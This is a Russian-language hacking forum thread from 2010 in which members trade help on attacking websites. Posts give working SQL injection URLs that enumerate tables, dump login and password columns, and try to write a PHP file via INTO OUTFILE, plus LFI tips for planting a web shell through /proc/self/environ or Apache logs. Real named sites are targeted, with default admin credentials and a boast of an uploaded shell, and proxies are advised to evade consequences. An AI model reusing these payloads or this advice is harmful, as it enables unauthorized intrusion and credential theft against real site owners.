Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. a1ertso

    a1ertso New Member

    Joined:
    16 Dec 2009
    Messages:
    35
    Likes Received:
    0
    Reputations:
    0
    Есть скуль, версия 5, узнал нужную таблицу, колонки в ней, но когда делаю запрос вида:
    site.ru/news.php?id=-1+union+select+version(),2,3+from+uzzerss-- кроме ошибки ничего не вижу... В чем может быть проблема? пробовал перевести в хэкс колонку и версию, но ничего толкового не вышло .
     
  2. .:[melkiy]:.

    .:[melkiy]:. Elder - Старейшина

    Joined:
    25 Jan 2009
    Messages:
    355
    Likes Received:
    314
    Reputations:
    163
    http://forum.antichat.ru/thread104591.html =\\\\
     
  3. Imperou$

    Imperou$ Elder - Старейшина

    Joined:
    23 May 2008
    Messages:
    90
    Likes Received:
    42
    Reputations:
    0
    Пробовал также. В общем видимо иньекция действительно в лимите.Я вроде где то тут читал,что можно обойти, если ткнёте, буду признателен.Не могу найти. Или глючит =)
     
  4. Ayowa

    Ayowa Member

    Joined:
    25 Dec 2009
    Messages:
    10
    Likes Received:
    9
    Reputations:
    2
    Имхо тут два варианта:
    1. Либо нет доступа к самой таблице.
    2. Либо табла находится в другой базе. Чтоб узнать базу пишем
    asd.ru/yo.php?yo=-123+union+select+1,2,table_schema,4+from+information_schema.tables+where+table_name=0x757a7a65727373+--+
    Ну и соответственно выбираем union+select+1,2,group_concat(concat_ws(0x3a,log,pass)),4+from+[table_schema].uzzerss+--+
     
  5. sqlinjector

    sqlinjector Member

    Joined:
    31 Dec 2009
    Messages:
    20
    Likes Received:
    6
    Reputations:
    0
    Я чайник, по шаблону не получаеццо =((
    в общем ситуация такая... делпю запрос
    получаю это вот tava:root@localhost:5.0.27
    Кодирую tava в 16-тиричную систему, получаю это 0x74617661
    Делаю запрос на таблицы этой бд
    и мне пишут ошибку mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /data/www/.....
     
    #11045 sqlinjector, 13 Jan 2010
    Last edited: 13 Jan 2010
  6. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    732
    Likes Received:
    646
    Reputations:
    251
    ввв.бла-бла-бла.ком/ID=1309+union+select+1,group_concat(table_name+SEP ARATOR+0x3a),3,4,5,6,7,8,9,10,11,12,13, 14,15,16,17,18,19,20,21,22+FROM+information_schema.tables+WHERE+ table_schema=0x74617661--
     
  7. sqlinjector

    sqlinjector Member

    Joined:
    31 Dec 2009
    Messages:
    20
    Likes Received:
    6
    Reputations:
    0
    Спасибо Ctacok, понял свой косяк.. набрал ссылочку и получил эти вот ошибки..
    Warning: extract() [function.extract]: First argument should be an array in /data/www/.../details.php on line 12...
    Warning: Invalid argument supplied for foreach() in /data/www/.../details.php on line 40...
    Warning: Invalid argument supplied for foreach() in /data/www/.../details.php on line 121...

    Это с правами свфязано или запрос некорретный всетаки ?
     
  8. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    732
    Likes Received:
    646
    Reputations:
    251
    Скинь в пм линк сайта, посмотрю.
     
  9. ILYAtirtir

    ILYAtirtir Elder - Старейшина

    Joined:
    25 Apr 2007
    Messages:
    142
    Likes Received:
    246
    Reputations:
    73
    :)
     
    1 person likes this.
  10. ILYAtirtir

    ILYAtirtir Elder - Старейшина

    Joined:
    25 Apr 2007
    Messages:
    142
    Likes Received:
    246
    Reputations:
    73
    Ок.
    Тот же сайт к сведению,просто там другая страница была.Кстати нормально всё работает,видимо он пробелы не удалил.
     
  11. Alf0x0ns

    Alf0x0ns Member

    Joined:
    12 Jan 2010
    Messages:
    14
    Likes Received:
    5
    Reputations:
    1
    нашел:
    Где-то с 40 сайтов на которых присутствует уязвимость LFI:
    На большой части с них присутствуют:
    Code:
    /proc/self/environ
    /proc/self/status
    /proc/self/fd/2
    /proc/self/fd/7
    /proc/self/fd/10
    /proc/version
    /proc/self/cmdline
    /proc/devices
    
    Практичыске я проверил вручную большую часть найденных уязвимостей на залития шелла.
    Что и не дало ни 1 жданного результата (true).

    Вопрос: с тех директорий что я показал выше на все из них можно заливать шелл?
    Вопрос2: как узнавать директорию в которую нужно заливать шелл, если вывода ошибки нет!
    Пока все!)
     
    #11051 Alf0x0ns, 14 Jan 2010
    Last edited: 14 Jan 2010
  12. 547

    547 Active Member

    Joined:
    11 Oct 2009
    Messages:
    216
    Likes Received:
    105
    Reputations:
    50
    [censored]

    а вот как заливать шелл будеш? тут уже нужно эксперементировать...

    если присутствует /proc/self/environ пробуй с помощю user-agent'a подменить код на свой...

    либо через логи апача, либо через сессии-но тут есть одно но, нужно знать путь:)
     
    #11052 547, 14 Jan 2010
    Last edited by a moderator: 15 Jan 2010
  13. Iceangel_

    Iceangel_ Elder - Старейшина

    Joined:
    9 Jul 2006
    Messages:
    494
    Likes Received:
    532
    Reputations:
    158
    омг, что за чушь?=\

    2 Alf0x0ns
    советую ознакомиться с http://forum.antichat.ru/showpost.php?p=1088072&postcount=11, думаю это частично решит твою проблему залития шеллов в данном случае

    то что ты привел выше, не директории.

    поиск и чтение конфигов вебсервера (к примеру /etc/httpd/conf/httd.conf)
    поиск пхпинфо на самом сайте и сайтах рядом
     
  14. 020963

    020963 Banned

    Joined:
    5 Sep 2008
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    я понимаю что это вроди как не по теме. Да и целая тема подобная на мой вопрос уже есть. но все спрошу здесь:
    Вот начал я изучать sql инъекции недавно. Что мне за это грозит в плане проблем (в том числе и креминально-адменистративных). Я просто посылаю всякие там запросы к БД. узнаю версию, имена таблиц, полей, логов, пасов в них. Но ничево вредоносного не делаю. даже хеши на стараюсь разкодировать. Просто занимаюсь этим в целях общего развития. Я так понимаю что они там могут анализировать все запросы которые к ним поступаю ну или по крайней мере те в которых содаржаться слова select, union и т.д. И без проблем могут узнать мой IP, а из него номер телефона и адресс. Как вы думаете они это могут, а если могут то станут? (я ведь им ниче плохогоо не зделал).
     
  15. Iceangel_

    Iceangel_ Elder - Старейшина

    Joined:
    9 Jul 2006
    Messages:
    494
    Likes Received:
    532
    Reputations:
    158
    2 020963
    Юзай прокси и не будет подобных проблем.
    это плохо, что понимаешь, но все равно пишешь
    тебя могут "креминально" наказать, т.ч. заготавливай крем.
     
  16. Alf0x0ns

    Alf0x0ns Member

    Joined:
    12 Jan 2010
    Messages:
    14
    Likes Received:
    5
    Reputations:
    1
    - Конечно настучать могут и должны это делать в целях своей же безопасности)
    - Ну станут это ищо как сказать .. все зависит от руководства(владелеца) сервера. Больше шансов получить если сайт на котором тестиш уязвимости есть крупным проектом!
     
  17. jecka3000

    jecka3000 Elder - Старейшина

    Joined:
    15 Mar 2008
    Messages:
    360
    Likes Received:
    54
    Reputations:
    4
    получем ошибку
    ну судя по всему это инклуд, хотя хз...

    пытаюсь приинклудить шелл, но ошибка остается...

    в чем проблема?


    и второй вопрос.
    Code:
    www.riskcenter.com
    имя и пароль из БД admin;admin

    админка /admin (но потом идет редирект на http://admin801.securesites.net/cgi-bin/manage.pl/index.html

    также имеется директория конфиг.пхп , но походу она пуста), пхпинфо тоже присутсвует...
    phpmyadmin в однименно диретории...

    реально ли тут применить "читалку" и попасть в пхпмай админ или каким либо другим образом, если да, то как?
     
    #11057 jecka3000, 15 Jan 2010
    Last edited: 15 Jan 2010
  18. v1d0qz

    v1d0qz Elder - Старейшина

    Joined:
    21 Jul 2007
    Messages:
    67
    Likes Received:
    90
    Reputations:
    52
    http://adm in801.securesites.net/risk2.tar а это случаем не екап сайта? :)

    попробывал залить через двойной запрос..
    http://admin801.securesites.net/story.php?id=-19469+union+select+0x2d3120756e696f6e2073656c65637420312c312c332c342c352c362c372c382c392c31302c31312c31322c31332c31342c31352c31362c31372c31382c31392066726f6d206d7973716c2e7573657220696e746f206f757466696c6520272f746d702f7465737474322e70687027,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+mysql.user--+

    Но что-то не хочет лить даже в /tmp, странно..Может что пропустил подуставший...Хотя обычный подзапрос типа union select 1,2,3..19 from mysql.user where name = 'root', работает на ура.

    Второй вариант, читаешь конфиг, заходишь в phpmyadmin и заливаешь шелл ) я уже :) Скажу по секрету, папка с правами там есть :)
     
    #11058 v1d0qz, 15 Jan 2010
    Last edited: 15 Jan 2010
  19. YuNi|[c

    YuNi|[c Elder - Старейшина

    Joined:
    17 Sep 2006
    Messages:
    293
    Likes Received:
    33
    Reputations:
    18
    вот вопрос таков:
    в ответ
    поставил ') или комбинаации не пашет.
    Прошу совета
     
  20. [NiGHT]DarkAngel

    [NiGHT]DarkAngel Elder - Старейшина

    Joined:
    29 Mar 2005
    Messages:
    131
    Likes Received:
    40
    Reputations:
    16
    Как понять комбинация не пашет? Ты подставил только это?Покажи полностью строчку которую ты подставляешь в уязвимый скрипт?

    Переформулируй пожалуйста вопрос, с более точной конкретикой описаний действий и что ты хочешь получить в результате.

    PS "В правильно поставленном вопросе, половина ответа на него" (с) Не помню кто ...
     
Thread Status:
Not open for further replies.